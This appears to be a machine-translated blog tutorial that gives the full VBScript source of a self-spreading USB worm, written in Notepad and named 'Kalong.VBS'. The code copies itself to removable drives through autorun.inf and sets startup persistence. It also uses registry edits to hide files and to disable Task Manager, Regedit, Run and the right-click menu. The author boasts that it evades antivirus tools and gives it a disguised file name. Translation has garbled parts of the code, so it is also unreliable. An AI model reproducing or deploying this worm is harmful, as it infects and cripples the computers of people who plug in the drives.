Creating Simple Virus Via Notepad

Fad Flash Disc striking my brother suddenly I find any a local malcode made with VBS language. Well, turns out the virus maker will begin to look wearing VBS language. Perhaps because it involves IPR (Intellectual Property Rights) because of the many outstanding VB6.0 is pirated. So he made the virus with VBS can be made only with Windows Notepad as in the existing compiler with integrated, Windows-Based Script Host.
Sesua I promise, we will make a simple virus using Notepad. This virus will make itself spread to removable disc with AutoRun so that other computers plugged an infected flash disc will immediately become victims without running infector User waited for her. This virus I gave the name "Kalong.VBS". Now open Notepad her. Copy the following code:
'// - Beginning of code, set so that when the error is left, and then proceed virus activity - //on error resume next
'// - Dim the following words - //rekur dim, windowpath, flashdrive, fs, mf, content, tf, bats, nt, check, sd
'// - Set a text that will be created for Autorun Setup Information - //content = "[autorun]" & vbCrLf & "shellexecute = wscript.exe k4l0n6.dll.vbs"set fs = createobject ("Scripting.FileSystemObject")set mf = fs.getfile (Wscript.ScriptFullname)dim text, sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream (1, -2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbCrLfloopdo
'// - Copy itself to be the master file in the Windows Path (example: C: \ Windows)Set windowpath = fs.getspecialfolder (0)set tf = fs.getfile (windowpath & "\ batch- k4l0n6.dll.vbs")tf.attributes = 32set tf = fs.createtextfile (windowpath & "\ batch- k4l0n6.dll.vbs", 2, true)tf.write recursivetf.closeset tf = fs.getfile (windowpath & "\ batch- k4l0n6.dll.vbs")tf.attributes = 39'// - Create Atorun.inf to run automatically each flash disc virus tercolok - //'Spread to every drive that bertype 1 and 2 (removable) including diskettes
for each flashdrive in fs.drives'// - Check Drive - //If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'// - Create Infector if it turns out Drivetypr 1 or 2. Or A: \ - //set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs")tf.attributes = 32set tf = fs.createtextfile (flashdrive.path & "\ k4l0n6.dll.vbs", 2, true)tf.write recursivetf.closeset tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs")tf.attributes = 39
'// - Create Atorun.inf that his text had been prepared (Auto Setup Information) - //set tf = fs.getfile (flashdrive.path & "\ autorun.inf")tf.attributes = 32set tf = fs.createtextfile (flashdrive.path & "\ autorun.inf", 2, true)tf.write contentstf.closeset tf = fs.getfile (flashdrive.path & "\ autorun.inf")tf.attributes = 39end ifnext
'// - Registry Manipulation - //
sets bat = createobject ("WScript.Shell")
'// - Manip - Change Title Internet Explorer becomes THE bat vs ZAY - //kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", "THE bat vs ZAY "
'// - Manip - Set so that the hidden files are not displayed in Explorer - //kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Advanced \ Hidden", "0", "REG_DWORD"
'// - Manip - Remove the Find menu, Folder Options, Run, and blocking Regedit and Task Manager - //kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFind", "1", "REG_DWORD"kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFolderOptions", "1", "REG_DWORD"kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoRun", "1", "REG_DWORD"kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, "1", "REG_DWORD"kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableTaskMgr", "1", "REG_DWORD"
'// - Manip - Disable right click - //kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, "1", "REG_DWORD"
'// - Manip - Come Messages Every Windows Startup - //kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ LegalNoticeCaption", "Worm Bats. Variant from Rangga-Zay, do not panic all the data are safe. "
'// - Manip - On every Windows Startup - //kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Systemdir", windowpath & "\ batch- k4l0n6.dll.vbs"
'// - Manip - RegisteredOwner and Organization Change - //kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOrganization", "The Batrix"kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOwner", "Bats"
'// - Well if this code I do not know, please Mas Aat_S to explain - //check if <> 1 thenWscript.sleep 200000end ifwhile loops check <> 1set sd = createobject ("WScript.Shell")sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname'End of Code
Save the code in Notepad by means FILE> SAVE. Then save as type select "All Files (*. *). Save with name: k4l0n6.dll.vbs. Need not actually use * .dll also do nothing but attempt to avoid suspicious wrote.
He he ... Worm Virus is indeed not purely of my own thoughts because it mimics his code-Zay Rangga virus. But that is better because it is not detectable wear PCMAV RC15, ClamAV, and AVAST. This was counted for you know that makes the virus / worm does not need to buy pirated software. Wear Notepad (on Windows Original) also.